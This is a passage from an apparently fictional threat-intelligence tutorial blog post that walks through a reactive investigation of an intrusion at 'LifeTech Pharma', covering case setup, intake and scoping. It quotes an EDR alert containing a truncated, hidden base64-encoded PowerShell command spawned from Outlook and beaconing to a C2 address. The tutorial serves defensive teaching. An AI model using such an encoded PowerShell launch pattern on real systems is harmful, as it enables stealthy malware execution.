href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#5829"><strong>Step R2: Timeline — Two Paths, One Actor</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#06d0"><strong>Step R3: Claims Ledger — Every Assertion Traced to Evidence</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#bc78"><strong>Step R4: ATT&amp;CK Mapping — Where Detection Failed</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#7d71"><strong>Step R5: Attribution Assessment — Same Actor or Two?</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#b2e8"><strong>Step R6: Detection Rules — Four That Would Have Changed the Outcome</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#d8bd"><strong>Step R7: Deliverables — What Each Stakeholder Gets</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#cf97"><strong>The Git History: What a Completed Investigation Looks Like</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#5f5a"><strong>Key Lessons</strong></a></li></ol><h3>The Scenario</h3><p><strong>LifeTech Pharma Ltd.</strong> is a mid-sized Israeli pharmaceutical company in Rehovot. It develops and manufactures generic drugs and biological APIs, exports to the US, EU, and MENA, and recently signed a $52 million licensing deal with a US biopharma partner. The signed formula files are stored on SERVER-RD-02\LicenseDeals\USPartner2024\ — 47 files, approximately 380 MB compressed.</p><p>On <strong>Friday, 15 November 2024 at 18:47 IST</strong>, the on-call SOC analyst receives a CrowdStrike behavioral detection:</p><pre>ALERT: Suspicious PowerShell Activity<br>Severity: High — Behavioral IOA<br>Host: WS-CFO-01.lifetechpharma.local  [Michal Cohen, CFO]<br>Process: powershell.exe (PID 3784)<br>Parent: OUTLOOK.EXE (PID 2240)<br>CommandLine: powershell.exe -NonI -W Hidden -Enc JABjAD0ATgBlAHcA...<br>Timestamp: 2024-11-15T18:42:33Z</pre><p>That’s the visible trigger. The actual breach started <strong>24 days earlier</strong> — and the alert is the second of two entry points, not the first.</p><h3>Step 00: Clone, Initialize, and Fill the Template</h3><p><strong>Before the phone rings.</strong> This step takes three minutes and is done once per investigation — ideally before the alert even comes in, or in the first five minutes after hanging up the initial call.</p><h4>1. Clone the repository (one-time setup)</h4><p>If you have not cloned CTI_as_a_Code yet, do this once on your analyst workstation:</p><pre>cd ~<br>git clone https://github.com/anpa1200/CTI_as_a_Code.git</pre><p>You will never modify this clone. It is your template source. Leave it as-is and pull updates periodically:</p><pre>cd ~/CTI_as_a_Code &amp;&amp; git pull</pre><h4>2. Create your investigations folder</h4><pre>mkdir -p ~/investigations</pre><p>Use any path you prefer — just keep it consistent across all cases. Do not create investigations inside the CTI_as_a_Code clone.</p><h4>3. Copy the reactive template for this case</h4><pre>cp -r ~/CTI_as_a_Code/templates/reactive/ ~/investigations/lifetech-2024-11</pre><p>Naming convention: [org-slug]-[YYYY-MM]. One folder per case. Verify the structure:</p><pre>ls ~/investigations/lifetech-2024-11/<br>tree ~/investigations/lifetech-2024-11/</pre><p>Expected:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/705/1*DR69iFmEn8s2K0zCrhXk5A.png"></figure><pre>00-scope/   01-evidence/   02-sources/   03-analysis/<br>04-detections/   05-deliverables/   06-ai-outputs/   07-feedback/<br>README.md   intake-form.md   project.yml</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zQn6v0h7KSMb9nw5gfYp8Q.png"></figure><h4>4. Initialize git inside the case folder</h4><pre>cd ~/investigations/lifetech-2024-11<br>git init<br>git add .<br>git commit -m "PROJ-2024-001: scaffold initialized from reactive template"</pre><p>This is commit zero. Its purpose is to prove — to a lawyer, an auditor, or yourself — exactly what state you started from before any analysis began.</p><h4>5. Fill in project.yml</h4><p>This file is the single source of truth for project metadata. Open it now:</p><pre>nano project.yml</pre><p>The template has blank fields. Fill every one(During the investigation):</p><pre>project:<br>  id: "PROJ-2024-001"<br>  name: "LifeTech Pharma — Targeted Intrusion"<br>  type: reactive<br>  classification: TLP:AMBER<br>  status: in-progress<br>analyst:<br>  name: "Your Name"<br>  role: "CTI Analyst"<br>  contact: "your@email.com"<br>timeline:<br>  incident_date: "2024-11-15"<br>  detection_date: "2024-11-15"<br>  investigation_start: "2024-11-15"<br>  report_due: "2024-11-17"         # INCD 72h clock - expires 18:47 IST Nov 17<br>pirs:<br>  - id: PIR-001<br>    question: "Was the US licensing formula package (SERVER-RD-02\\USPartner2024\\) accessed or exfiltrated? If so, what and when?"<br>    priority: high<br>    status: open<br>  - id: PIR-002<br>    question: "How did the adversary gain initial access - phishing, credential theft, or exploitation?"<br>    priority: high<br>    status: open<br>  - id: PIR-003<br>    question: "Is there evidence of ongoing access or persistence as of investigation date?"<br>    priority: high<br>    status: open<br>scope:<br>  systems:<br>    - WS-CFO-01<br>    - WS-IT-LEVI<br>    - SERVER-RD-02<br>    - SERVER-FIN-01<br>    - DC01<br>  threat_actor: unknown<br>  attck_techniques: []             # leave blank now - fill during R4<br>deliverables:<br>  - type: executive-brief<br>    status: pending<br>  - type: soc-handoff<br>    status: pending<br>  - type: sigma-rules<br>    count: 0<br>    status: pending<br>notes: "INCD 72h notification clock starts 2024-11-15 18:47 IST. Legal hold on WS-IT-LEVI - no hardware access, RTR only."</pre><p><strong>Do not leave any field as </strong><strong>"" or </strong><strong>[] if you know the value.</strong> Unknown fields are fine — write unknown explicitly. A blank field means "forgot to fill in." unknown means "we looked and do not know yet."</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*S90ed0BEsiZXgIu4G3ia5Q.png"></figure><h4>6. Commit the filled metadata</h4><pre>git add project.yml<br>git commit -m "PROJ-2024-001: project.yml filled — 3 PIRs, INCD deadline 2024-11-17 18:47 IST, legal hold WS-IT-LEVI"</pre><p>The folder is now named, scoped, and version-controlled. The intake call can begin.</p><h3>Step 0: Intake — What the First Call Captures</h3><p>Before opening Splunk, before pivoting on the C2 IP, before forming a hypothesis — the intake call runs. This is 15 minutes with the Tier 2 escalation and the IR Lead before any analysis work begins.</p><p>The intake captures facts that change what you look for.</p><p><strong>Open the intake form before dialing:</strong></p><pre>cp intake-form.md 00-scope/intake-2024-11-15.md<br>nano 00-scope/intake-2024-11-15.md</pre><p>The template has 9 sections. Work through them in order during the call — do not paraphrase in real time, write what the reporter says verbatim. You will analyze it after. For LifeTech this call produces:</p><pre># Investigation Intake — PROJ-2024-001 — 2024-11-15<br><br>Completed by: On-call CTI analyst (Yael Mizrahi)<br>Intake call with: Noa Ben-David (IR Lead), Ran Katz (SOC Manager)<br>Call time: 2024-11-15 18:55 IST<br><br>---<br><br>## 1. What was reported?<br><br>**1.1 What did you see or receive that caused you to raise this?**<br>"CrowdStrike fired a high-severity behavioral IOA on Michal Cohen's workstation —<br>PowerShell with base64 payload launched directly from Outlook. Tier 1 pulled the<br>network tab and found 3 outbound connections to 203.0.113.87 over the last 15<br>minutes. This is the CFO's machine. We escalated immediately."<br><br>**1.2 Where did this first come to your attention?**<br>- [x] Alert from SIEM / EDR / AV  ← CrowdStrike Falcon behavioral IOA, severity: High<br><br>**1.3 When did you first notice it?**<br>Date: 2024-11-15   Time: 18:47   Timezone: IST (UTC+2)<br><br>**1.4 Do you believe the activity is still ongoing?**<br>- [x] Yes — still active (C2 connections still firing at time of call)<br><br>---<br><br>## 2. What is already known?<br><br>**2.1 What systems, accounts, or services appear to be involved?**<br>- WS-CFO-01.lifetechpharma.local — Michal Cohen, CFO. Dell Latitude, Windows 11.<br>- 203.0.113.87 — external IP, destination of C2 connections. Not in any allowlist.<br>- OUTLOOK.EXE (PID 2240) → powershell.exe (PID 3784) — parent-child confirmed.<br>- No other hosts identified yet — investigation is 8 minutes old.<br><br>**2.2 What was the observed behavior?**<br>"PowerShell with -NonI -W Hidden -Enc flags spawned from Outlook. The encoded<br>command has not been decoded yet. Three separate TCP connections to 203.0.113.87<br>on port 443 over 15 minutes — looks like a beacon pattern."<br><br>**2.3 Has anyone else already investigated or looked into this?**<br>- [x] Yes — Tier 1 analyst (Omer Cohen) ran initial Splunk queries (last 1 hour only).<br>  What did they touch: read-only Splunk queries. No changes to the endpoint.<br><br>**2.4 What do you think happened?**<br>"Probably a phishing email with a malicious attachment — xlsm macro or something<br>similar. Michal must have opened it in the last few hours. We don't know if anyone<br>else was targeted."<br><br>---<br><br>## 3. Timeline of discovery<br><br>**3.1 When do you believe the activity started?**<br>- [ ] Known<br>- [x] Estimated: activity on WS-CFO-01 started approximately 18:42 IST (PowerShell<br>  launch timestamp from CrowdStrike event).<br><br>**3.2 How long do you estimate the activity has been occurring?**<br>Approximately 13 minutes from first PowerShell event to escalation call (18:42–18:55 IST).<br>However: unknown whether this is the beginning of the intrusion or a later stage.<br><br>**3.3 Is there a specific event that triggered the alert or complaint?**<br>CrowdStrike behavioral IOA fired at 18:42:33 IST on WS-CFO-01. Tier 1 escalated<br>at 18:47. IR Lead paged at 18:52. Intake call started at 18:55.<br><br>---<br><br>## 4. What has already been done?<br><br>**4.1 Has any system been rebooted, shut down, or reimaged since the activity was discovered?**<br>- [x] No — WS-CFO-01 is still running. Not yet isolated.<br><br>**4.2 Have any credentials, tokens, or API keys been rotated or revoked?**<br>- [x] No — no credential changes made yet.<br><br>**4.3 Has any network access been blocked or firewall rules been changed?**<br>- [x] No — 203.0.113.87 has not been blocked. Ran confirmed: "We wanted to check<br>  with you first before blocking — didn't want to tip them off."<br><br>**4.4 Has any malware been deleted or quarantined?**<br>- [x] No — CrowdStrike flagged the process but did not quarantine. Alert status: Detected,<br>  not Prevented (policy is set to Detect-only on this machine — CFO exception policy).<br><br>**4.5 Has anyone notified external parties?**<br>- [x] No — no external notification yet. INCD assessment pending scope confirmation.<br><br>---<br><br>## 5. Systems and access<br><br>**5.1 What logging is expected to exist for the affected systems?**<br>- Endpoint logs (Sysmon, CrowdStrike): [x] Yes — CrowdStrike on WS-CFO-01. Sysmon on<br>  WS-CFO-01. NOTE: Sysmon NOT deployed on server-class machines or DC01.<br>- VPN / authentication logs: [x] Yes — Cisco AnyConnect VPN, logs in Splunk.<br>- Database audit logs: [x] Yes — SQL audit on SERVER-RD-02 (partial EIDs only).<br>- Network flow / firewall logs: [x] Yes — Palo Alto NGFW. RETENTION: 14 days only.<br>  ⚠ SERVER-RD-02 outbound logs will expire 2024-11-29 for today's traffic.<br>- Email gateway logs: [x] Yes — M365 Message Trace, 30-day retention. ATP enabled.<br>  NOTE: ATP sandbox NOT enabled for xlsm files — policy gap identified.<br>- Cloud provider logs: [x] Yes — Azure AD sign-in logs, 30-day retention.<br><br>**5.2 What tools and access does the analyst have?**<br>- [x] Admin access to affected hosts (CrowdStrike RTR for WS-CFO-01, WS-CFO-01 CrowdStrike console)<br>- [x] Read access to SIEM (Splunk — full org)<br>- [x] Access to EDR console (CrowdStrike Falcon — full org view)<br>- [x] Access to network equipment / firewall logs (Palo Alto Panorama — read only)<br>- [x] Access to cloud console (Azure AD — Security Reader role)<br>- [x] Access to email gateway (M365 Security &amp; Compliance — Message Trace)<br>- [ ] VPN / jump host credentials — not yet, request submitted<br>- [x] TheHive / OpenCTI lab access<br><br>**5.3 Are there any systems the analyst should NOT touch?**<br>⚠ WS-IT-LEVI (Paz Levi, IT Admin): LEGAL HOLD issued at 20:45 IST today.<br>  HR investigation underway — UNRELATED to this incident (employment matter).<br>  Hardware access BLOCKED for 48–72 hours per Legal counsel (Adv. Dina Shapiro).<br>  Remote CrowdStrike RTR is PERMITTED — confirmed by Legal.<br>  No memory image, no disk image, no physical access until hold lifted.<br><br>---<br><br>## 6. Business impact<br><br>**6.1 What business processes are affected or at risk?**<br>"The CFO's email and workstation are involved. If this is a full compromise, finance<br>data is at risk. We also have R&amp;D server SERVER-RD-02 — it holds the formula files<br>for the US licensing deal. That deal closes in 6 weeks. If those files were touched,<br>we have an FDA NDA issue and a $52M deal at risk."<br><br>**6.2 Is customer data, employee data, or regulated data potentially involved?**<br>- [x] Yes — type: proprietary formula files under FDA NDA filing (USPartner2024 package,<br>  47 files, ~380 MB). Also: employee financial data on SERVER-FIN-01 if CFO path<br>  extended to finance server.<br><br>**6.3 What is the financial exposure if this is confirmed?**<br>Direct deal risk: $52M US licensing agreement. Regulatory exposure: Israeli Privacy<br>Protection Law (PPL) fines + FDA NDA breach penalties. Reputational exposure: US<br>partner disclosure obligation if formula data confirmed exfiltrated.<br><br>**6.4 Is there a hard deadline driving this investigation?**<br>- [x] Yes — deadline: INCD 72-hour notification window starts from discovery of<br>  breach (not discovery of alert). If formula data or critical infrastructure<br>  involvement confirmed: clock starts NOW → expires 2024-11-17 ~18:47 IST.<br><br>---<br><br>## 7. Regulatory and legal constraints<br><br>**7.1 Are there applicable notification requirements?**<br><br>| Regulation | Applicable? | Deadline | Notified? |<br>|---|---|---|---|<br>| INCD (Israeli critical infrastructure) | TBD — assess after scope confirmed | 72h from discovery | No |<br>| Biometric Database Authority | No — no biometric data at LifeTech | — | N/A |<br>| BoI-CD 362 (Israeli financial) | No — LifeTech is not a financial entity | — | N/A |<br>| GDPR | TBD — EU customers in export data? | 72h from awareness | No |<br>| PCI-DSS | No — no card processing at LifeTech | — | N/A |<br>| Israeli Privacy Protection Law | Yes — employee + partner data in scope | Per PPL — notify DPA if breach confirmed | No |<br>| FDA / NDA obligation | Yes — if formula files confirmed exfiltrated | Immediate notification to US partner | No |<br><br>**7.2 Is there an active legal hold on any systems or data?**<br>- [x] Yes — WS-IT-LEVI (Paz Levi). Legal hold issued 2024-11-15 20:45 IST.<br>  Contact: Adv. Dina Shapiro (Legal). Hold expected: 48–72 hours minimum.<br><br>**7.3 Has legal counsel been notified?**<br>- [x] Yes — Adv. Dina Shapiro notified of the security incident at 19:10 IST.<br>  Advised: do not touch WS-IT-LEVI hardware. RTR permitted with logging.<br><br>---<br><br>## 8. Analyst notes<br><br>(Raw notes taken during call — unprocessed)<br><br>- Ran (SOC): "The CFO is still at the office. We haven't told her yet. Should we?"<br>  → IR Lead decision: do not inform CFO until after memory dump. Risk: she might<br>  reboot the machine.<br>- The CrowdStrike policy on WS-CFO-01 is DETECT-ONLY (CFO exception policy).<br>  This is why the process was not killed automatically. SOC should evaluate<br>  moving to Prevent for exec machines after this incident.<br>- 203.0.113.87 — not blocklisted anywhere in org. Ran says: "It's clean on our<br>  end, never seen it before." Worth enriching immediately (VirusTotal, Shodan).<br>- Memory dump of WS-CFO-01 is urgent — C2 is still active. Process may have<br>  network artifact or decrypted payload in memory. Action: RTR memory dump NOW.<br>- No mention of SERVER-RD-02 during this call — IR Lead is not aware of the<br>  formula file risk yet. Will scope that separately after evidence inventory.<br>- p.levi (WS-IT-LEVI) is under HR investigation for unrelated reason. Legal hold<br>  is coincidental. However: IT admin access + legal hold + security incident<br>  creates a complex situation. Document carefully.<br><br>---<br><br>## 9. Next actions<br><br>| # | Action | Owner | Due |<br>|---|---|---|---|<br>| 1 | Take memory dump of WS-CFO-01 via CrowdStrike RTR before C2 session ends | Yael (CTI) | Immediate |<br>| 2 | Enrich 203.0.113.87 — VirusTotal, Shodan, passive DNS, ASN lookup | Yael (CTI) | Within 30 min |<br>| 3 | Pull M365 Message Trace for m.cohen last 48h — identify delivery vector | Omer (Tier 1) | Within 30 min |<br>| 4 | Retrieve Palo Alto firewall logs for WS-CFO-01 and SERVER-RD-02 — full available window | Ran (SOC) | Within 1h ⚠ retention risk |<br>| 5 | Check Azure AD sign-in logs for m.cohen and p.levi — last 30 days | Yael (CTI) | Within 1h |<br>| 6 | Confirm SERVER-RD-02 USPartner2024 directory access — pull EID 4663 from Splunk | Yael (CTI) | Within 2h |<br>| 7 | Open TheHive case PROJ-2024-001, attach this intake as first observable | Yael (CTI) | Within 30 min |<br>| 8 | Advise IR Lead on INCD 72h clock — confirm if formula data scope triggers mandatory notification | Noa (IR Lead) + Legal | Within 2h |<br><br>---<br><br>*Intake completed 2024-11-15 19:18 IST. File saved as 00-scope/intake-2024-11-15.md.*<br>*Case opened in TheHive: PROJ-2024-001.*<br>```<br><br>Two items in this intake change the entire investigation trajectory: the legal hold on `WS-IT-LEVI` (you cannot image it), and the potential for formula data in scope (Israeli PPL + FDA notification obligations). Both need to be on the table before analysis starts, not discovered mid-investigation.<br><br>The intake commits to git first:</pre><p>Two items in this intake change the entire investigation trajectory: the legal hold on WS-IT-LEVI (you cannot image it), and the potential for formula data in scope (Israeli PPL + FDA notification obligations). Both need to be on the table before analysis starts, not discovered mid-investigation.</p><p>The intake commits to git first:</p><pre>git add 00-scope/intake-2024-11-15.md<br>git commit -m "PROJ-001: intake — CFO PowerShell alert, legal hold on WS-IT-LEVI, formula data in scope"</pre><h3>Step 1–2: Project Setup and Scope</h3><p>The folder and git repo already exist from Step 00. This step fills the scope document and gets stakeholder sign-off before any analysis begins. The rule: <strong>you do not start looking at logs until the scope is committed.</strong></p><h4>1. Open the scope document</h4><pre>nano 00-scope/scope.md</pre><pre># Intelligence Source Registry<br><br>**Project:** PROJ-2024-001 — LifeTech Pharma Targeted Intrusion<br><br>Admiralty Scale: Source reliability A (completely reliable) – F (reliability cannot be judged).  <br>Information reliability: 1 (confirmed) – 6 (truth cannot be judged).<br><br>---<br><br>## Internal Sources<br><br>| ID | Source | Type | Admiralty | Notes |<br>|---|---|---|---|---|<br>| INT-001 | Splunk SIEM | Log aggregation | A/2 | Primary forensic source; full org scope; read-only access. Initial 1h Splunk query by Tier 1 (Omer Cohen) — covered WS-CFO-01 only. |<br>| INT-002 | CrowdStrike Falcon | EDR / endpoint telemetry | A/2 | Deployed on WS-CFO-01, WS-IT-LEVI. NOT deployed on R&amp;D server fleet (12 servers) or DC01. CFO machine on Detect-only policy (not Prevent). |<br>| INT-003 | Palo Alto NGFW (Panorama) | Firewall flows / NetFlow | A/2 | Read-only. 14-day retention. ⚠ SERVER-RD-02 Nov 6 outbound flows expire 2024-11-20 — retrieve before any other task. |<br>| INT-004 | M365 Message Trace | Email gateway logs | A/2 | 30-day retention. ATP sandbox NOT enabled for .xlsm files — phishing attachment delivered uninspected. |<br>| INT-005 | Azure AD sign-in logs | Cloud authentication | A/2 | 30-day retention. Security Reader role. Covers m.cohen and p.levi sign-in history. |<br>| INT-006 | Sysmon (WS-CFO-01, WS-IT-LEVI) | Endpoint process/network telemetry | A/2 | NOT deployed on server-class machines (SERVER-RD-02, SERVER-FIN-01, DC01). |<br>| INT-007 | Windows Security event logs (DC01, SERVER-RD-02) | Authentication / authorization | A/2 | DC01: partial export only — full log inaccessible. EID 4662 (DCSync) and EID 4663 (object access) relevant. |<br>| INT-008 | SQL audit — SERVER-RD-02 | Database object-access audit | A/2 | Partial EIDs only; not all object-access events captured. Required for PIR-001 (formula file access). |<br>| INT-009 | Cisco AnyConnect VPN | VPN session logs | A/2 | Available in Splunk. Covers p.levi sessions (AiTM hypothesis). |<br><br>---<br><br>## External / OSINT Sources<br><br>| ID | Source | Type | Admiralty | TLP | Notes |<br>|---|---|---|---|---|---|<br>| EXT-001 | CERT-IL | Government advisory | A/2 | TLP:AMBER | Check for active advisories targeting Israeli pharma sector. |<br>| EXT-002 | VirusTotal | IOC enrichment | C/3 | TLP:WHITE | Immediate priority: 203.0.113.87 hash/IP lookup. Crowdsourced — treat as corroborating only. |<br>| EXT-003 | Shodan | Infrastructure recon | C/3 | TLP:WHITE | 203.0.113.87 ASN / infrastructure / open-port lookup. |<br>| EXT-004 | URLScan.io | Domain analysis | C/3 | TLP:WHITE | Passive DNS and domain history for C2 domains identified in flows. |<br>| EXT-005 | MISP | Community threat intel | B/3 | TLP:AMBER | Pharma sector sharing. Cross-reference IOCs against community feed. |<br><br>---<br><br>## Source Limitations<br><br>| Source | Known Limitation |<br>|---|---|<br>| Palo Alto NGFW (INT-003) | 14-day retention only. SERVER-RD-02 Nov 6 outbound flows expire **2024-11-20** — retrieve immediately, before any other analysis. |<br>| CrowdStrike Falcon (INT-002) | Not deployed on R&amp;D server fleet (12 servers) or DC01. No EDR telemetry for those hosts — Windows Security events and NGFW logs are the only visibility. |<br>| Sysmon (INT-006) | Not deployed on server-class machines (SERVER-RD-02, SERVER-FIN-01, DC01). Process creation and network telemetry unavailable for those hosts. |<br>| Windows Security / DC01 (INT-007) | Only partial event log export available; full log is inaccessible. Analytical confidence on DC01 activity is reduced. |<br>| M365 ATP (INT-004) | Sandbox not enabled for .xlsm attachments. The suspected phishing attachment was delivered without detonation — no ATP verdict available. |<br>| SQL audit — SERVER-RD-02 (INT-008) | Partial EIDs only. Not all object-access events are captured. Absence of a log entry does NOT confirm file was not accessed. |<br>| WS-IT-LEVI — all sources | Legal hold issued 2024-11-15 20:45 IST (Adv. Dina Shapiro). No hardware, disk, or memory image permitted. CrowdStrike RTR allowed with full session logging. Re-assess after hold lifted (est. 48–72h). |<br>| Azure AD sign-in logs (INT-005) | 30-day retention. Historical data before approximately 2024-10-15 is unavailable. |<br>| M365 Message Trace (INT-004) | 30-day retention. Historical data before approximately 2024-10-15 is unavailable. |<br>| VirusTotal (EXT-002) | Crowdsourced; vendor detections may be absent for fresh infrastructure. A clean VT result does not rule out malicious use. Treat as corroborating, not authoritative. |</pre><p>The template has six sections. Fill each one now:</p><p><strong>Header — fill the four metadata lines at the top:</strong></p><pre>Project: PROJ-2024-001<br>Classification: TLP:AMBER<br>Date scoped: 2024-11-15<br>Scoped by: [your name]<br>Approved by: Noa Ben-David, IR Lead</pre><p><strong>Incident Summary — one paragraph, what triggered this:</strong></p><pre>CrowdStrike behavioral detection on WS-CFO-01 at 18:42 IST, November 15, 2024.<br>PowerShell spawned by OUTLOOK.EXE with base64-encoded payload, downloading from<br>203.0.113.87. Scope of compromise unknown. Formula files on SERVER-RD-02 are<br>potentially in scope — US licensing deal ($52M) requires regulatory assessment.</pre><p><strong>In Scope — fill the asset table:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DCTpI5jIcRRkQ2YqjL8LgQ.png"></figure><p><strong>Out of Scope — fill the exclusion table:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*X9YT7xlqBXmn_mRAm67QwA.png"></figure><p><strong>PIRs — copy from project.yml, add due dates:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Fz8_y2Mq8glncIY5VHdEMA.png"></figure><p><strong>Constraints and Assumptions — fill the four fields:</strong></p><pre>Legal/regulatory: INCD 72h notification window expires 2024-11-17 18:47 IST.<br>  Israeli Privacy Protection Law + FDA NDA obligations if formula data confirmed.<br>Evidence limitations: Palo Alto firewall logs — 14-day retention.<br>  SERVER-RD-02 Nov 6 outbound logs expire 2024-11-20. Retrieve immediately.<br>  Sysmon absent from all server-class machines.<br>Access restrictions: WS-IT-LEVI — legal hold, no hardware access. RTR permitted.<br>Assumptions: All timestamps assumed UTC unless marked IST. Not converted in log excerpts.</pre><p><strong>Definition of Done — check the boxes your team has agreed to:</strong></p><pre>- [ ] All PIRs answered or formally deferred with reasoning<br>- [ ] Timeline covers full attacker dwell period (or gap documented)<br>- [ ] ATT&amp;CK mapping reviewed and finalized<br>- [ ] At least one detection rule per confirmed TTP<br>- [ ] SOC handoff delivered and acknowledged<br>- [ ] Executive brief approved by Noa Ben-David (IR Lead)<br>- [ ] INCD notification filed if formula data confirmed</pre><p>Full scope.md:</p><pre># Scope Definition<br><br>**Project:** PROJ-2024-001<br>**Classification:** TLP:AMBER<br>**Date scoped:** 2024-11-15<br>**Scoped by:** Yael Mizrahi (CTI Analyst)<br>**Approved by:** Noa Ben-David (IR Lead) — verbal approval 19:22 IST<br><br>---<br><br>## Incident Summary<br><br>CrowdStrike behavioral IOA fired on WS-CFO-01 (Michal Cohen, CFO) at 18:42 IST on<br>2024-11-15. PowerShell with encoded payload launched from OUTLOOK.EXE; three outbound<br>C2 connections to 203.0.113.87 confirmed within 15 minutes of detection. Scope of<br>compromise is unknown at time of scoping — the CFO alert may be a late-stage indicator<br>of a broader intrusion. Formula files on SERVER-RD-02 (US licensing package, ~380 MB,<br>47 files) are in scope for PIR-001 due to financial and regulatory exposure ($52M deal,<br>FDA NDA obligations). INCD 72h notification clock assessed as active from time of<br>discovery.<br><br>---<br><br>## In Scope<br><br>| Asset / System | Owner | Justification |<br>|---|---|---|<br>| WS-CFO-01.lifetechpharma.local | IT Dept / Michal Cohen (CFO) | Triggering alert host — CrowdStrike IOA, active C2 |<br>| WS-IT-LEVI.lifetechpharma.local | IT Dept / Paz Levi (IT Admin) | Suspected initial access vector — AiTM phishing hypothesis |<br>| SERVER-RD-02.lifetechpharma.local | R&amp;D Dept | Formula file storage — PIR-001 primary asset |<br>| SERVER-FIN-01.lifetechpharma.local | Finance Dept | Lateral movement target — confirmed by CrowdStrike alert Nov 15 |<br>| DC01.lifetechpharma.local | IT Dept | DCSync event EID 4662 observed from non-DC IP |<br>| Exchange Online (M365) | IT / Microsoft | Email delivery vector — phishing investigation |<br>| Azure AD | IT / Microsoft | Authentication logs — VPN session token replay |<br>| Palo Alto NGFW (perimeter) | IT / Network team | C2 traffic confirmation, SERVER-RD-02 exfil flows |<br><br>---<br><br>## Out of Scope<br><br>| Asset / System | Reason for Exclusion |<br>|---|---|<br>| SharePoint Online / OneDrive | Cloud scope — no evidence of involvement; requires separate authorization |<br>| Manufacturing SCADA / OT network | No evidence of lateral movement into OT segment at this time |<br>| WS-IT-LEVI — hardware / disk image | Legal hold issued 2024-11-15 20:45 IST. No hardware access until hold lifted. RTR permitted. |<br>| All other endpoints (838 total) | Out of scope pending hunt results — may expand if pivot on C2 domains finds new hosts |<br><br>---<br><br>## Priority Intelligence Requirements (PIRs)<br><br>| ID | Question | Priority | Due | Status |<br>|---|---|---|---|---|<br>| PIR-001 | Was the US licensing formula package (`SERVER-RD-02\LicenseDeals\USPartner2024\`) accessed or exfiltrated? If so, what and when? | High | 2024-11-16 06:00 IST | Open |<br>| PIR-002 | How did the adversary gain initial access — phishing, credential theft, exploitation, or insider? | High | 2024-11-16 06:00 IST | Open |<br>| PIR-003 | Is there evidence of ongoing access or persistence as of 2024-11-15 19:00 IST? Are any other hosts compromised? | High | 2024-11-16 06:00 IST | Open |<br><br>---<br><br>## Constraints and Assumptions<br><br>- **Legal/regulatory:** INCD 72h notification window — expires approximately 2024-11-17<br>  18:47 IST. Israeli Privacy Protection Law (PPL) notification to DPA if personal data<br>  breach confirmed. FDA NDA obligation to notify US partner if formula files confirmed<br>  exfiltrated — no specific deadline but immediate notification is standard practice.<br>- **Evidence limitations:**<br>  - Palo Alto NGFW firewall flows: 14-day retention only. SERVER-RD-02 November 6<br>    outbound traffic expires 2024-11-20. **Retrieve before any other analysis.**<br>  - Sysmon NOT deployed on server-class machines (SERVER-RD-02, SERVER-FIN-01, DC01).<br>  - CrowdStrike NOT deployed on R&amp;D server fleet (12 servers) or DC01.<br>  - DC01 Windows Security log: only partial export available — full log inaccessible.<br>  - ATP sandbox not enabled for .xlsm files — attachment was delivered uninspected.<br>- **Access restrictions:**<br>  - WS-IT-LEVI: legal hold, no hardware/disk/memory access. CrowdStrike RTR permitted<br>    with full session logging. Contact Adv. Dina Shapiro before any exception.<br>  - VPN jump host credentials: requested, not yet provisioned (Yael Mizrahi, 19:05 IST).<br>- **Assumptions:**<br>  - All log timestamps assumed UTC unless explicitly marked IST in source.<br>  - CrowdStrike behavioral detections treated as CONFIRMED source (Admiralty A/2).<br>  - Sysmon EID events treated as CONFIRMED source where forwarder health is verified.<br><br>---<br><br>## Stakeholders<br><br>| Name | Role | Involvement |<br>|---|---|---|<br>| Noa Ben-David | IR Lead | Scope approval; receives executive brief; INCD notification decision |<br>| Ran Katz | SOC Manager | SOC handoff; implements detection rules; hunting queries |<br>| Adv. Dina Shapiro | Legal Counsel | Legal hold oversight; PPL / regulatory notifications; WS-IT-LEVI access decisions |<br>| [CISO name] | CISO | Executive brief recipient; $52M deal brief to Board |<br>| [US Partner contact] | External — US biopharma | FDA NDA notification if PIR-001 answered YES |<br><br>---<br><br>## Definition of Done<br><br>This investigation is complete when:<br><br>- [ ] All three PIRs answered or formally deferred with documented reasoning<br>- [ ] Timeline covers full attacker dwell period from first access to detection (or gap documented)<br>- [ ] ATT&amp;CK mapping completed and reviewed — all confirmed techniques have a gap type<br>- [ ] At least one Sigma detection rule per confirmed TTP with Rule Missing or Coverage Incomplete gap<br>- [ ] SOC handoff document delivered to Ran Katz and acknowledged<br>- [ ] Executive brief approved by Noa Ben-David (IR Lead)<br>- [ ] INCD notification filed if formula data or CII involvement confirmed (deadline: 2024-11-17 18:47 IST)<br>- [ ] PPL / FDA NDA notification decision documented (even if decision is: not required)<br>- [ ] project.yml status set to `closed` and all PIR statuses updated</pre><h4>2. Save the file and commit</h4><pre>git add 00-scope/scope.md<br>git commit -m "PROJ-2024-001: scope signed off — 5 systems, 3 PIRs, INCD deadline 2024-11-17, firewall log retrieval urgent"</pre><p><strong>The firewall log retention deadline drives everything.</strong> SERVER-RD-02’s November 6 outbound traffic expires November 20. That is the exfiltration confirmation window. If it closes, CL-003 becomes INFERRED, not CONFIRMED. Retrieve those logs before any other analysis.</p><h3>Step R1: Evidence Inventory — What Exists and What Is Missing</h3><p>The evidence inventory runs before analysis. The rule: <strong>you do not analyze what you have not inventoried.</strong></p><h4>1. Open the source registry</h4><pre>nano 02-sources/source-registry.md</pre><p>The template has 